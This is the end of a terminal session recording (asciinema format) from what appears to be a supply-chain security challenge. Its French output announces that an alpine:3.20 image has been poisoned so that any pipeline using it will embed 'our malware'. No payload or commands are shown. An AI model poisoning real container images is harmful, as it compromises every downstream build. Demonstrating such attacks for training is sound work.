[0.090089, "o", "ge"]
[0.180246, "o", " a"]
[0.090052, "o", "l"]
[0.090123, "o", "pi"]
[0.090119, "o", "ne"]
[0.09012, "o", ":3"]
[0.090146, "o", ".2"]
[0.09009, "o", "0 "]
[0.09012, "o", "em"]
[0.090167, "o", "po"]
[0.180149, "o", "is"]
[0.090106, "o", "on"]
[0.090151, "o", "n"]
[0.090153, "o", "é"]
[0.090089, "o", "e "]
[0.090113, "o", "et"]
[0.090122, "o", " a"]
[0.090122, "o", "pl"]
[0.09016, "o", "at"]
[0.180274, "o", "ie"]
[0.090142, "o", ".\u001b"]
[0.09005, "o", "[0"]
[0.090144, "o", "m"]
[0.692604, "i", "\r"]
[0.000106, "o", "\r\n"]
[0.003618, "o", "$ "]
[1.045516, "i", "\r"]
[0.001476, "o", "\u001b["]
[0.180123, "o", "1m"]
[0.180287, "o", "→ "]
[0.090097, "o", "To"]
[0.090113, "o", "ut"]
[0.090122, "o", "e "]
[0.090162, "o", "pi"]
[0.090117, "o", "pe"]
[0.090122, "o", "li"]
[0.180278, "o", "ne "]
[0.090106, "o", "qu"]
[0.090117, "o", "i "]
[0.090178, "o", "fa"]
[0.090103, "o", "it"]
[0.090151, "o", " F"]
[0.090104, "o", "RO"]
[0.09012, "o", "M "]
[0.090117, "o", "al"]
[0.180225, "o", "pi"]
[0.090131, "o", "ne:"]
[0.090113, "o", "3."]
[0.09013, "o", "20"]
[0.090158, "o", " e"]
[0.090072, "o", "mb"]
[0.090142, "o", "ar"]
[0.090122, "o", "qu"]
[0.090108, "o", "er"]
[0.18022, "o", "a "]
[0.090123, "o", "no"]
[0.090082, "o", "tre"]
[0.090147, "o", " m"]
[0.090118, "o", "al"]
[0.090099, "o", "wa"]
[0.09014, "o", "re"]
[0.090129, "o", ".\u001b"]
[0.090155, "o", "[0"]
[0.180209, "o", "m"]
[4.22122, "i", "\r"]
[0.000103, "o", "\r\n"]
[0.003479, "o", "$ "]
[2.04946, "i", "\r"]
[0.001399, "o", "\u001b["]
[0.180263, "o", "1m"]
[0.180193, "o", "✅\u001b"]
[0.090147, "o", "[0"]
[0.090092, "o", "m"]
[1.70262, "i", "\r"]
[0.000119, "o", "\r\n"]
[0.01622, "o", "\u001b]0;skhoury@skhoury:~/go/src/github.com/sherine-k/supply-chain-dd/challenges/challenge3\u0007"]
[0.00005, "o", "\u001b]3008;end=508b8f66-0102-45fa-b8a5-98555122fff8;exit=success\u001b\\"]
[0.004197, "o", "\u001b]3008;start=3bac6e2a-5169-45a8-bb41-8e0960da1cc6;machineid=13ced54cfadd482cb31a63653129207c;user=skhoury;hostname=skhoury;bootid=2e78e15d-7d07-4046-8f12-62936f125abb;pid=00000000000000444237;type=shell;cwd=/home/skhoury/go/src/github.com/sherine-k/supply-chain-dd/challenges/challenge3\u001b\\"]
[0.011462, "o", "\u001b[?2004h╭─╼skhoury@skhoury \u001b[32m~/.../challenges/challenge3 \r\r\n\u001b[00m╰─ \u001b[91m(sherine)-\u001b[00m$ \r\u001b[00m╰─ \u001b[91m(sherine)-\u001b[00m$ "]
[1.566813, "i", "\u0004"]
[0.000056, "o", "\u001b[?2004l\r\r\n"]
[0.000011, "o", "exit\r\n"]
[0.001373, "x", "0"]
